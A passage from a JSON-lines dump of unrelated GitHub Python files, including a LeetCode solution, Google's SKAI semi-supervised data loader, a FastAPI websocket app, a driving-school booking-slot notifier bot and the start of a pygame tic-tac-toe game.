m)","repo_name":"yousefkh2/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6453412981","text":"# https://leetcode.com/problems/maximal-square/\n# tags: matrix, dp\n\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n m, n = len(matrix), len(matrix[0])\n dp = [[0 for i in range(n+1)] for j in range(m+1)]\n\n out = 0\n for i in range(1, m+1):\n for j in range(1, n+1):\n if matrix[i-1][j-1] == '1':\n dp[i][j] = min(dp[i-1][j], dp[i][j-1], dp[i-1][j-1]) + 1\n out = max(out, dp[i][j])\n\n return out*out\n","repo_name":"sangyeopjung/leetcode","sub_path":"matrix/MaximalSquare.py","file_name":"MaximalSquare.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11559194206","text":"def read_nums(debug: bool = False) -> list[int]:\n if debug:\n # from problem listing\n return [4, 11, 4, 1, 4, 7, 11, 12, 13, 14, 7, 0, 3]\n\n nums: list[int] = []\n with open(\"dane/dane4.txt\") as file:\n for line in file:\n sline = line.strip()\n nums.append(int(sline))\n\n return nums\n","repo_name":"bartekpacia/matura","sub_path":"matury/2020pr/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"4027127132","text":"import logging\nimport os\n\nimport pytest\nimport sys\n\n# add_module_to_sys_path\ndirectory = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../../pypi_org'))\nsys.path.insert(0, directory)\n\nimport app\n\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\n\n@pytest.yield_fixture(scope=\"session\")\ndef flask_app():\n try:\n app.app.config.update({\n 'TESTING': True,\n # Default port is 5000\n 'LIVESERVER_PORT': 7777,\n # Default timeout is 5 seconds\n 'LIVESERVER_TIMEOUT': 10,\n })\n app.main()\n except Exception as err:\n logging.error(f'Error: \"{err}\" on try to init flask app')\n raise err\n\n yield app","repo_name":"AleksNeStu/projects","sub_path":"web_apps/001_pypi/proj/tests/src/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74320279769","text":"from typing import Iterable, List, Mapping, Optional\n\nfrom absl import logging\nimport numpy as np\nfrom skai.semi_supervised import utils\nimport tensorflow.compat.v1 as tf\n\n\nNUM_CHANNELS_PRE_DISASTER = 3\nNUM_CHANNELS_POST_DISASTER = 3\nNUM_MASK_CHANNELS = 2 # 1 channel for each mask black and white png\nPARALLEL_PARSE = 4 # Number of parallel calls to make to parse dataset\nPARALLEL_AUGMENT = 4 # Number of parallel calls to make to augment dataset\n\nIMAGE_KEY = 'image'\nLABEL_KEY = 'label'\nCOORDS_KEY = 'coordinates'\nPRE_IMAGE_PNG_KEY = 'pre_image_png'\nPOST_IMAGE_PNG_KEY = 'post_image_png'\nPRE_SEGMENTATION_PNG_KEY = 'pre_image_segmentations'\nPOST_SEGMENTATION_PNG_KEY = 'post_image_segmentations'\n\n\ndef random_flip(x: tf.Tensor, seed: Optional[int] = None) -> tf.Tensor:\n \"\"\"Randomly flips given image.\n\n Args:\n x: Input image.\n seed: Random seed.\n\n Returns:\n Flipped image.\n \"\"\"\n x = tf.image.random_flip_left_right(x, seed=seed)\n x = tf.image.random_flip_up_down(x, seed=seed)\n return x\n\n\ndef random_shift(x: tf.Tensor,\n w: int = 4,\n seed: Optional[int] = None) -> tf.Tensor:\n \"\"\"Randomly shifts given image by specified amount.\n\n Args:\n x: Input image.\n w: Max number of pixels to shift in any one direction.\n seed: Random seed.\n\n Returns:\n Randomly shifted image.\n \"\"\"\n padded_x = tf.pad(x, [[w] * 2, [w] * 2, [0] * 2], mode='REFLECT')\n return tf.random_crop(padded_x, tf.shape(x), seed=seed)\n\n\nAUGMENTATIONS = [random_flip, random_shift] # Default augmentations of MixMatch\n\n\nclass SSLDataset:\n \"\"\"Dataset class with format required for SSL code.\n\n Attributes:\n name: Name of the dataset.\n train_labeled: The tf.data.Dataset of the labeled training data.\n train_unlabeled: The tf.data.Dataset of the unlabeled training data.\n test: The tf.data.Dataset of the test data.\n unlabeled_validation_examples: The sample of unlabeled examples reserved for\n validation.\n eval_labeled: A version of the labeled training data for evaluation.\n eval_unlabeled: A version of the unlabeled training data for evaluation.\n height: Height of the imagery.\n width: Width of the imagery.\n channels: Number of channels.\n nclass: Number of classes.\n mean: Mean across channels in entire dataset, for whitening.\n std: Standard deviation across channels in entire dataset, for whitening.\n use_pre_disaster_image: Boolean that indicates pre-disaster imagery is\n imagery is available.\n p_labeled: DO NOT USE. Required for MixMatch code but not actively used.\n p_unlabeled: DO NOT USE. Required for MixMatch code but not actively used.\n \"\"\"\n\n def __init__(self,\n name: str,\n train_labeled: tf.data.Dataset,\n train_unlabeled: tf.data.Dataset,\n test: tf.data.Dataset,\n unlabeled_validation_examples: tf.data.Dataset,\n eval_labeled: tf.data.Dataset,\n eval_unlabeled: tf.data.Dataset,\n height: int,\n width: int,\n channels: int,\n nclass: int,\n mean: float,\n std: float,\n use_pre_disaster_image: Optional[bool] = True,\n p_labeled: Optional[float] = None,\n p_unlabeled: Optional[float] = None):\n self.name = name\n self.train_labeled = train_labeled\n self.train_unlabeled = train_unlabeled\n self.eval_labeled = eval_labeled\n self.eval_unlabeled = eval_unlabeled\n self.test = test\n self.unlabeled_validation_examples = unlabeled_validation_examples\n self.height = height\n self.width = width\n self.channels = channels\n self.nclass = nclass\n self.mean = mean\n self.std = std\n self.use_pre_disaster_image = use_pre_disaster_image\n self.p_labeled = p_labeled\n self.p_unlabeled = p_unlabeled\n\n\ndef _parse_record(\n serialized_example: str, use_mask: bool,\n use_pre_disaster_image: bool) -> Mapping[str, tf.Tensor]:\n \"\"\"Parse a record and return a dict for dataset.\n\n Args:\n serialized_example: String that specifies location of record to be parsed.\n use_mask: Boolean indicating whether to parse segmentation mask features.\n use_pre_disaster_image: Boolean indicating that pre-disaster images are\n available.\n\n Returns:\n A dict with an image and label key, where the image is a multi-channel image\n that has combined the pre- and post-disaster images.\n \"\"\"\n features_config = {\n POST_IMAGE_PNG_KEY: tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.float32),\n 'coordinates': tf.FixedLenFeature([2], tf.float32)\n }\n if use_pre_disaster_image:\n features_config[PRE_IMAGE_PNG_KEY] = tf.FixedLenFeature([], tf.string)\n if use_mask:\n features_config[PRE_SEGMENTATION_PNG_KEY] = tf.FixedLenFeature([],\n tf.string)\n features_config[POST_SEGMENTATION_PNG_KEY] = tf.FixedLenFeature([],\n tf.string)\n\n features = tf.parse_single_example(\n serialized_example, features=features_config)\n\n post_png = tf.image.decode_image(\n features[POST_IMAGE_PNG_KEY])\n if use_pre_disaster_image:\n pre_png = tf.image.decode_image(features[PRE_IMAGE_PNG_KEY])\n image_channels = [pre_png, post_png]\n # TODO(jlee24): use enum constants to define order and indices of\n # channels.\n # Expectations about the order of channels are hardcoded into fixmatch.py\n # (for summary images) and ctaugment.py (for only augmenting the pre and\n # post images).\n if use_mask:\n pre_mask = tf.image.decode_image(features[PRE_SEGMENTATION_PNG_KEY])\n post_mask = tf.image.decode_image(features[POST_SEGMENTATION_PNG_KEY])\n image_channels.append(pre_mask)\n image_channels.append(post_mask)\n image = tf.concat(image_channels, axis=-1)\n else:\n image = post_png\n image = tf.cast(image, tf.float32) * (2.0 / 255) - 1.0\n label = tf.cast(features['label'], tf.int64)\n coordinates = tf.cast(features['coordinates'], tf.float64)\n\n return {IMAGE_KEY: image, LABEL_KEY: label, COORDS_KEY: coordinates}\n\n\ndef _parse_dataset(\n filenames: Iterable[str],\n shuffle: bool = False,\n use_mask: bool = False,\n use_pre_disaster_image: bool = True) -> tf.data.Dataset:\n \"\"\"Parallel parsing of dataset.\n\n Args:\n filenames: List of TfRecord filenames to be loaded into a TFRecordDataset.\n shuffle: Boolean to shuffle dataset when true and do nothing otherwise.\n use_mask: Boolean indicating whether to parse segmentation mask features.\n use_pre_disaster_image: Boolean indicating that pre-disaster images are\n available.\n\n Returns:\n A TFRecordDataset with parsed examples, shuffled if shuffle is True.\n \"\"\"\n filenames = sorted(sum([tf.gfile.Glob(x) for x in filenames], []))\n if shuffle:\n np.random.shuffle(filenames)\n ds = tf.data.TFRecordDataset(filenames)\n para = 4 * max(1, len(utils.get_available_gpus())) * PARALLEL_PARSE\n return ds.map(\n lambda x: _parse_record(x, use_mask, use_pre_disaster_image),\n num_parallel_calls=para)\n\n\ndef _compute_mean_std(ds: tf.data.Dataset) -> Iterable[float]:\n \"\"\"Compute mean and standard deviation across entire training dataset.\n\n Args:\n ds: The tf.data.Dataset for which to compute mean and standard deviation.\n\n Returns:\n The mean and standard deviation per channel.\n \"\"\"\n ds = ds.map(lambda x: x[IMAGE_KEY]).batch(1024).prefetch(1)\n ds = ds.make_one_shot_iterator().get_next()\n count = 0\n stats = []\n with tf.Session(config=utils.get_config()) as sess:\n\n def iterator():\n while True:\n try:\n yield sess.run(ds)\n except tf.errors.OutOfRangeError:\n break\n\n logging.info('Computing dataset mean and std')\n for batch in iterator():\n ratio = batch.shape[0] / 1024.\n count += ratio\n stats.append((batch.mean((0, 1, 2)) * ratio, (batch**2).mean(\n (0, 1, 2)) * ratio))\n mean = sum(x[0] for x in stats) / count\n sigma = sum(x[1] for x in stats) / count - mean**2\n std = np.sqrt(sigma)\n logging.info('Mean %d Std: %d', mean, std)\n return mean, std\n\n\ndef _memoize(ds: tf.data.Dataset) -> tf.data.Dataset:\n \"\"\"Store the dataset in memory to speed up access.\n\n Args:\n ds: The tf.data.Dataset to memoize.\n\n Returns:\n Returns a dataset that has been memoized.\n \"\"\"\n data = []\n with tf.Session(config=utils.get_config()) as session:\n ds = ds.prefetch(16)\n it = ds.make_one_shot_iterator().get_next()\n try:\n while 1:\n data.append(session.run(it))\n except tf.errors.OutOfRangeError:\n pass\n images = np.stack([x[IMAGE_KEY] for x in data])\n labels = np.stack([x[LABEL_KEY] for x in data])\n coordinates = np.stack([x[COORDS_KEY] for x in data])\n\n def tf_get(index):\n image, label, coordinate = tf.py_func(\n lambda i: (images[i], labels[i], coordinates[i]), [index],\n [tf.float32, tf.int64, tf.float64])\n return {IMAGE_KEY: image, LABEL_KEY: label, COORDS_KEY: coordinate}\n\n ds = tf.data.Dataset.range(len(data))\n return ds.map(tf_get)\n\n\ndef get_example_files(patterns: List[str]) -> List[str]:\n \"\"\"Retrieve the examples given the file pattern.\n\n Args:\n patterns: The file pattern(s) that specifies where the examples are located.\n\n Returns:\n A list of example filenames.\n\n Raises:\n ValueError when no example files are found with the given pattern.\n \"\"\"\n all_filenames = []\n for example_pattern in patterns:\n filenames = tf.gfile.Glob(example_pattern)\n if not filenames:\n raise ValueError(f'No example files found for {example_pattern}.')\n all_filenames.extend(filenames)\n if not all_filenames:\n raise ValueError(f'No example files found among {patterns}.')\n return all_filenames\n\n\ndef _stack_augment(x: Mapping[str, tf.Tensor], num_augmentations: int,\n expected_channels: int) -> Mapping[str, tf.Tensor]:\n \"\"\"Give unlabeled data nu-augmentations and stack them.\n\n Function originally from:\n google3/learning/brain/research/red_team/semi_supervised/libml/data.py\n\n Args:\n x: Example to augment.\n num_augmentations: Number of augmentations for class-consistency.\n expected_channels: Number of channels to expect in the image feature.\n\n Returns:\n A version of the augmentation function that stacks augmented images.\n \"\"\"\n imgs_to_stack = []\n labels_to_stack = []\n coords_to_stack = []\n for _ in range(num_augmentations):\n img_to_stack = tf.ensure_shape(x[IMAGE_KEY],\n (None, None, expected_channels))\n for augment_function in AUGMENTATIONS:\n img_to_stack = augment_function(img_to_stack)\n imgs_to_stack.append(img_to_stack)\n labels_to_stack.append(x[LABEL_KEY])\n coords_to_stack.append(x[COORDS_KEY])\n\n return {\n IMAGE_KEY: tf.stack(imgs_to_stack),\n LABEL_KEY: tf.stack(labels_to_stack),\n COORDS_KEY: tf.stack(coords_to_stack)\n }\n\n\ndef _weak_augment(train_label: tf.data.Dataset, train_unlabel: tf.data.Dataset,\n num_augmentations: int, num_expected_channels: int):\n \"\"\"Weakly augments the training data with default transformations.\n\n Args:\n train_label: Dataset object containing labeled training data.\n train_unlabel: Dataset object containing unlabeled training data.\n num_augmentations: Number of augmentations to perform per image.\n num_expected_channels: Number of channels to expect in the image feature.\n\n Returns:\n Augmented versions of labeled dataset and unlabeled dataset.\n\n \"\"\"\n num_parallel_calls = max(1, len(\n utils.get_available_gpus())) * PARALLEL_AUGMENT\n # TODO(jlee24): Consider allowing user to specify augmentations by dict\n # that maps augmentation string name to function\n for augment_function in AUGMENTATIONS:\n train_label = train_label.map(\n lambda x: { # pylint: disable=g-long-lambda\n IMAGE_KEY:\n augment_function( # pylint: disable=cell-var-from-loop\n tf.ensure_shape(x[IMAGE_KEY],\n (None, None, num_expected_channels))),\n LABEL_KEY:\n x[LABEL_KEY],\n COORDS_KEY:\n x[COORDS_KEY]\n },\n num_parallel_calls)\n train_unlabel = train_unlabel.map(\n lambda x: _stack_augment(x, num_augmentations, num_expected_channels),\n num_parallel_calls)\n return train_label, train_unlabel\n\n\n# TODO(jlee24): Create multi-class version that selects arbitrary number of\n# labeled examples\ndef take_balanced(input_ds: tf.data.Dataset, num_positives: int,\n num_negatives: int, buffer_size: int):\n \"\"\"Take a specified number of positive and negative examples from a dataset.\n\n Args:\n input_ds: Input dataset. Should contain image, label, and coords tensors.\n num_positives: Maximum number of positive examples to take.\n num_negatives: Maximum number of negative examples to take.\n buffer_size: Number of examples to sample positives and negatives from.\n Should be at least num_positives + num_negatives.\n\n Returns:\n Dataset of positive and negative examples.\n \"\"\"\n\n def sample_balanced(batch):\n labels = batch[LABEL_KEY]\n images = batch[IMAGE_KEY]\n coords = batch[COORDS_KEY]\n neg_indexes = tf.squeeze(tf.where(tf.math.equal(labels, 0)), axis=1)\n neg_indexes = tf.slice(tf.random.shuffle(neg_indexes), [0], [num_negatives])\n pos_indexes = tf.squeeze(tf.where(tf.math.equal(labels, 1)), axis=1)\n pos_indexes = tf.slice(tf.random.shuffle(pos_indexes), [0], [num_positives])\n all_indexes = tf.concat((neg_indexes, pos_indexes), axis=0)\n shuffled_indexes = tf.random.shuffle(all_indexes)\n new_labels = tf.gather(labels, shuffled_indexes)\n new_images = tf.gather(images, shuffled_indexes)\n new_coords = tf.gather(coords, shuffled_indexes)\n return {\n LABEL_KEY: new_labels,\n IMAGE_KEY: new_images,\n COORDS_KEY: new_coords\n }\n\n return input_ds.batch(buffer_size).take(1).map(sample_balanced).unbatch()\n\n\n# TODO(jlee24): Allow taking specific number of labeled examples in\n# multi-class case\ndef create_dataset(name: str,\n train_label_filepatterns: List[str],\n train_unlabel_filepatterns: List[str],\n test_filepatterns: List[str],\n num_classes: int,\n height: int,\n width: int,\n shuffle: bool,\n num_labeled_examples: Optional[int],\n num_unlabeled_validation_examples: int,\n num_augmentations: int,\n inference_mode: bool = False,\n whiten: bool = False,\n do_memoize: bool = True,\n num_labeled_positives: int = 0,\n num_labeled_negatives: int = 0,\n use_mask: bool = False,\n use_pre_disaster_image: bool = True) -> SSLDataset:\n \"\"\"Create datasets with formats required by MixMatch and FixMatch.\n\n Args:\n name: Name of dataset.\n train_label_filepatterns: File pattern for labeled train examples.\n train_unlabel_filepatterns: File pattern for unlabeled train examples.\n test_filepatterns: File pattern for test examples.\n num_classes: Number of classes.\n height: Height of imagery in dataset.\n width: Width of imagery in dataset.\n shuffle: Boolean that, if true, shuffles filepatterns. Else, does nothing.\n num_labeled_examples: Number of examples to take from the labeled training\n dataset.\n num_unlabeled_validation_examples: Number of examples to sample from the\n unlabeled training set to validate model's performance on unlabeled data.\n num_augmentations: Number of augmentations.\n inference_mode: Boolean for inference mode, which requires only test data.\n whiten: Boolean that indiciates whether or not to whiten data.\n do_memoize: Boolean that indicates whether or not to memoize data.\n num_labeled_positives: Number of positive labeled examples to read.\n num_labeled_negatives: Number of negative labeled examples to read.\n use_mask: Boolean for adding building segmentation mask channels.\n use_pre_disaster_image: Boolean that indicates pre-disaster image is\n available.\n\n Returns:\n A SSLDataset object.\n \"\"\"\n logging.info('Creating dataset %s', (name))\n logging.info('Retrieving test data')\n test_files = get_example_files(test_filepatterns)\n num_channels_total = NUM_CHANNELS_POST_DISASTER\n if use_pre_disaster_image:\n num_channels_total += NUM_CHANNELS_PRE_DISASTER\n if use_mask:\n num_channels_total += NUM_MASK_CHANNELS\n test = _parse_dataset(\n test_files,\n shuffle=shuffle,\n use_mask=use_mask,\n use_pre_disaster_image=use_pre_disaster_image)\n\n if inference_mode:\n return SSLDataset(\n name,\n train_labeled=[],\n train_unlabeled=[],\n test=test,\n unlabeled_validation_examples=0,\n eval_labeled=[],\n eval_unlabeled=[],\n height=height,\n width=width,\n channels=num_channels_total,\n nclass=num_classes,\n mean=0,\n std=1,\n use_pre_disaster_image=use_pre_disaster_image)\n\n logging.info('Retrieving training data')\n train_label_files = get_example_files(train_label_filepatterns)\n train_unlabel_files = get_example_files(train_unlabel_filepatterns)\n train_unlabel_files += train_label_files\n\n logging.info('Parsing training examples')\n train_label = _parse_dataset(\n train_label_files,\n shuffle=shuffle,\n use_mask=use_mask,\n use_pre_disaster_image=use_pre_disaster_image)\n\n if num_labeled_examples:\n if num_labeled_positives > 0 or num_labeled_negatives > 0:\n # Sample a specific number of positive and negative labeled examples.\n # Note that you should probably set num_labeled_examples to 10x of\n # (num_labeled_positives + num_labeled_negatives) to ensure that the\n # sample is large enough to get the desired number of each.\n train_label = take_balanced(train_label, num_labeled_positives,\n num_labeled_negatives, num_labeled_examples)\n else:\n train_label = train_label.take(num_labeled_examples)\n train_unlabel_orig = _parse_dataset(\n train_unlabel_files,\n shuffle=shuffle,\n use_mask=use_mask,\n use_pre_disaster_image=use_pre_disaster_image)\n unlabeled_validation_examples = train_unlabel_orig.take(\n num_unlabeled_validation_examples)\n train_unlabel = train_unlabel_orig.skip(num_unlabeled_validation_examples)\n\n # Prepare the dataset following steps from MixMatch's data.py\n # 1. Calculate stats if whitening distribution later\n if whiten:\n logging.info('Calculating mean and std for whitening')\n mean, std = _compute_mean_std(train_label.concatenate(train_unlabel))\n else:\n mean, std = 0, 1\n\n # 2. Memoize\n if do_memoize:\n logging.info('Memoizing training data')\n train_label = _memoize(train_label)\n train_unlabel = _memoize(train_unlabel)\n\n # 3. Augment\n logging.info('Weakly augmenting training data')\n train_label, train_unlabel = _weak_augment(\n train_label,\n train_unlabel,\n num_augmentations=num_augmentations,\n num_expected_channels=num_channels_total)\n\n return SSLDataset(\n name,\n train_labeled=train_label,\n train_unlabeled=train_unlabel,\n test=test,\n unlabeled_validation_examples=unlabeled_validation_examples,\n eval_labeled=_parse_dataset(\n train_label_files,\n shuffle=shuffle,\n use_mask=use_mask,\n use_pre_disaster_image=use_pre_disaster_image),\n eval_unlabeled=train_unlabel_orig.skip(num_unlabeled_validation_examples),\n height=height,\n width=width,\n channels=num_channels_total,\n nclass=num_classes,\n mean=mean,\n std=std,\n use_pre_disaster_image=use_pre_disaster_image)\n","repo_name":"google-research/skai","sub_path":"src/skai/semi_supervised/dataloader/prepare_ssl_data.py","file_name":"prepare_ssl_data.py","file_ext":"py","file_size_in_byte":19965,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"31"} +{"seq_id":"3279804605","text":"positives = []\nnegatives = []\nevens = []\nodds = []\n\nintegers = [int(x) for x in input().split(\", \")]\nfor x in integers:\n if x >= 0:\n positives.append(x)\n else:\n negatives.append(x)\n\n if x % 2 == 0:\n evens.append(x)\n else:\n odds.append(x)\n\nprint(f'Positive: {\", \".join([str(x) for x in positives])}')\nprint(f'Negative: {\", \".join([str(x) for x in negatives])}')\nprint(f'Even: {\", \".join([str(x) for x in evens])}')\nprint(f'Odd: {\", \".join([str(x) for x in odds])}')\n\n","repo_name":"martopetkov/SoftUni_Python","sub_path":"python_fundamentals_course/exercise_5_lists_advanced/4.number_classification.py","file_name":"4.number_classification.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73094476887","text":"from fastapi import FastAPI, APIRouter, WebSocket, WebSocketDisconnect, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom starlette.websockets import WebSocketDisconnect as WSD\nfrom typing import List\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom .config import settings\nfrom .routers_tag import tags_metadata\n\n# Rotas\nfrom .routers import webinarjam\n\napp = FastAPI(\n title='Klow',\n description='API da Klow para Funil de Marketing',\n version='0.1.0',\n openapi_tags=tags_metadata\n)\n\n# Templates\n\n# Rotas\napi_router = APIRouter()\napi_router.include_router(webinarjam.router)\napp.include_router(api_router, prefix=settings.API_URL_STR) #Rota da api\n\n# Middlewares\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\n# Websocket teleprompter\nclass ConnectionManager:\n def __init__(self):\n self.active_connections: List[WebSocket] = []\n \n async def connect(self, websocket: WebSocket):\n await websocket.accept()\n self.active_connections.append(websocket)\n \n def disconnect(self, websocket: WebSocket):\n if websocket in self.active_connections:\n self.active_connections.remove(websocket)\n \n async def broadcast(self, data: dict):\n for connection in self.active_connections:\n await connection.send_json(data)\n\nmanager = ConnectionManager()\n\n@app.websocket('/ws')\nasync def websocket_endpoint(websocket: WebSocket):\n await manager.connect(websocket)\n while True:\n try:\n # Aguardando comandos do controle\n receive = await websocket.receive_text()\n # Enviando mensagem para toda a sala\n await manager.broadcast({'event': receive})\n except WebSocketDisconnect:\n manager.disconnect(websocket)","repo_name":"Maarcosv99/Webinar-Integracao","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5063414658","text":"import logging\r\nfrom os import access\r\nfrom requests import Session\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\n\r\nlogin_url = \"https://www.e-license.jp/el25/pc/p01a.action\"\r\nshift_jis_code = \"shift_jis\"\r\n\r\n\r\nsession = Session()\r\nheaders = {\r\n \"Host\": \"www.e-license.jp\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Content-Type\": \"application/x-www-form-urlencoded\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\"\r\n}\r\nsession.headers.update(headers)\r\n\r\nuser_id = \"*************\"\r\nuser_pass = \"************\"\r\nschool_id = \"19PdhBo7H3o+brGQYS+1OA==\"\r\n\r\n\r\n# logging.basicConfig()\r\n# logging.getLogger().setLevel(logging.DEBUG)\r\n# requests_log = logging.getLogger(\"requests.packages.urllib3\")\r\n# requests_log.setLevel(logging.DEBUG)\r\n# requests_log.propagate = True\r\n\r\ndef login():\r\n # Login sayfasini ac\r\n login_page_url=\"https://www.e-license.jp/el25/?abc=19PdhBo7H3o%2BbrGQYS%2B1OA%3D%3D\"\r\n session.get(login_page_url)\r\n\r\n print(\"Login Page'i aciyoruz:\")\r\n print(\"-------\")\r\n\r\n # Login hazirliklari\r\n session.headers[\"Referer\"] = login_page_url\r\n body_data = {\r\n \"b.studentId\": user_id,\r\n \"b.password\": user_pass,\r\n \"method:doLogin\": \"ログイン\",\r\n \"b.wordsStudentNo\": \"教習生番号\",\r\n \"b.processCd\": \"\",\r\n \"b.kamokuCd\": \"\",\r\n \"b.schoolCd\": school_id,\r\n \"index\": \"\",\r\n \"server\": \"el25aspa\",\r\n }\r\n\r\n\r\n # Logging\r\n print(\"Login yapiyoruz:\")\r\n response = session.post(login_url, data=body_data)\r\n\r\n print(\"Logging status code: \", response.status_code)\r\n # print(response.content.decode(shift_jis_code))\r\n\r\n print(\"-------\")\r\n\r\n\r\ndef fetch_calendar_html(page_number):\r\n calendar_page_url = \"https://www.e-license.jp/el25/pc/p03a.action\"\r\n calendar_type=\"\"\r\n page_count = 1\r\n\r\n if page_number == 1:\r\n calendar_type = \"A\"\r\n page_count = 1\r\n elif page_number > 2 and page_number <= 5:\r\n calendar_type = \"N\"\r\n page_count = page_number-1\r\n\r\n # request hazirligi\r\n body_data = {\r\n \"b.schoolCd\": school_id,\r\n \"b.processCd\": calendar_type,\r\n \"b.kamokuCd\": \"0\",\r\n \"b.lastScreenCd\": \"\",\r\n \"b.instructorTypeCd\": \"2\",\r\n \"b.dateInformationType\": \"\",\r\n \"b.infoPeriodNumber\": \"\",\r\n \"b.carModelCd\": \"101\",\r\n \"b.instructorCd\": \"0\",\r\n \"b.page\": page_count,\r\n \"b.groupCd\": \"1\",\r\n \"b.changeInstructorFlg\": \"0\",\r\n \"b.nominationInstructorCd\": \"0\",\r\n \"upDate\": str(time.time())[:-8],\r\n }\r\n\r\n response = session.post(calendar_page_url,data=body_data)\r\n print(\"calendar data status: \", response.status_code)\r\n\r\n print(\"Checking number of page: \", page_number)\r\n if page_number > 5:\r\n print(\"CALENDAR DATA: \", response.content.decode(shift_jis_code))\r\n return response.content.decode(shift_jis_code)\r\n\r\ndef logout():\r\n url = \"https://www.e-license.jp/el25/pc/logout.action?b.schoolCd=19PdhBo7H3o%2BbrGQYS%2B1OA%3D%3D&senisakiCd=4\"\r\n res = session.get(url)\r\n\r\ndef find_empty_time(html_data):\r\n soup = BeautifulSoup(html_data, 'html.parser')\r\n td_html_list = soup.find_all(\"td\", {\"class\": \"status1\"})\r\n\r\n date_times = []\r\n for td_html in td_html_list:\r\n tag_a = td_html.a\r\n onclick_str = tag_a.get(\"onclick\")\r\n\r\n onclick_data = onclick_str[12:-1].replace(\"'\", \"\").split(\",\")\r\n \r\n date = onclick_data[0]\r\n time_number = onclick_data[1]\r\n time = int(time_number)+7\r\n\r\n print(onclick_data, date, time)\r\n date_times.append((date, time))\r\n return date_times\r\n\r\n\r\n\r\n#This function sends the people subbed to the line bot, messages of the available reservation dates and times.\r\ndef send_line_message(date, time):\r\n access_token = \"********************\"\r\n import linebot\r\n line_bot = linebot.LineBotApi(access_token)\r\n linebot.LineBotApi(access_token)\r\n #line_bot.broadcast(linebot.models.TextSendMessage(text=f'Ulaaa ayik ol, {date} tarihinde saat {time} bos. Ayik ol!!'))\r\n try: \r\n line_bot.broadcast(linebot.models.TextSendMessage(text=f'Ulaaa ayik ol, {date} tarihinde saat {time} bos. Ayik ol!!'))\r\n except:\r\n print(\"line api error\")\r\n\r\n\r\nlogout()\r\nlogin()\r\n\r\ncache_data = []\r\ntime_calculator = 0\r\n\r\nwhile True:\r\n\r\n empty_date_times = []\r\n\r\n for page_number in range(1, 6):\r\n html_data = fetch_calendar_html(page_number)\r\n date_time_list = find_empty_time(html_data)\r\n empty_date_times += date_time_list\r\n\r\n if not date_time_list:\r\n continue\r\n\r\n for date_time in date_time_list:\r\n res_date = date_time[0]\r\n res_time = date_time[1]\r\n if (res_date, res_time) not in cache_data:\r\n send_line_message(res_date, res_time)\r\n cache_data.append((res_date, res_time))\r\n \r\n print(\"empty date and times: \", empty_date_times)\r\n\r\n # cache control\r\n for cached_date_time in cache_data:\r\n if cached_date_time not in empty_date_times:\r\n cache_data.remove(cached_date_time)\r\n\r\n print(\"cached_data: \", cache_data)\r\n\r\n print(\"-- sleeping 30 seconds.. \\n\\n\")\r\n time.sleep(30)\r\n\r\n\r\n\r\n","repo_name":"mhamzasezer/ehliyet_bot","sub_path":"ehliyet_bot.py","file_name":"ehliyet_bot.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38272069912","text":"# MODULES\r\nimport pygame, sys,time\r\n\r\n# initializes pygame\r\npygame.init()\r\npygame.font.init()\r\n\r\n# ---------\r\n# CONSTANTS\r\n# ---------\r\n\r\nWIDTH, HEIGHT = 690, 690\r\nLINE_WIDTH = 15\r\norg_x,org_y=55,55\r\ndes_x,des_y=0,0\r\ninc_x,inc_y=242,245\r\norg_x_centre,org_y_centre=100,100\r\nx_centres,y_centres=[100,340,580],[100,340,580]\r\nradius=69\r\ndist=240 #all the centres of whose we are seeing distance are in the same level(y-cord).So only see the x_direction distance will show the distance between the centres\r\nBOARD_ROWS = 3\r\nBOARD_COLS = 3\r\n\r\n# rgb: red green blue\r\nRED = (255, 0, 0)\r\nBG_COLOR = (28, 170, 156)\r\nLINE_COLOR = (23, 145, 135)\r\nCIRCLE_COLOR = (239, 231, 200)\r\nCROSS_COLOR = (66, 66, 66)\r\n\r\n# ------\r\n# IMAGES,FONTS\r\n# ------\r\ndef image_loader(path,width,height):\r\n img=pygame.image.load(path)\r\n img=pygame.transform.scale(img,(width,height))\r\n return 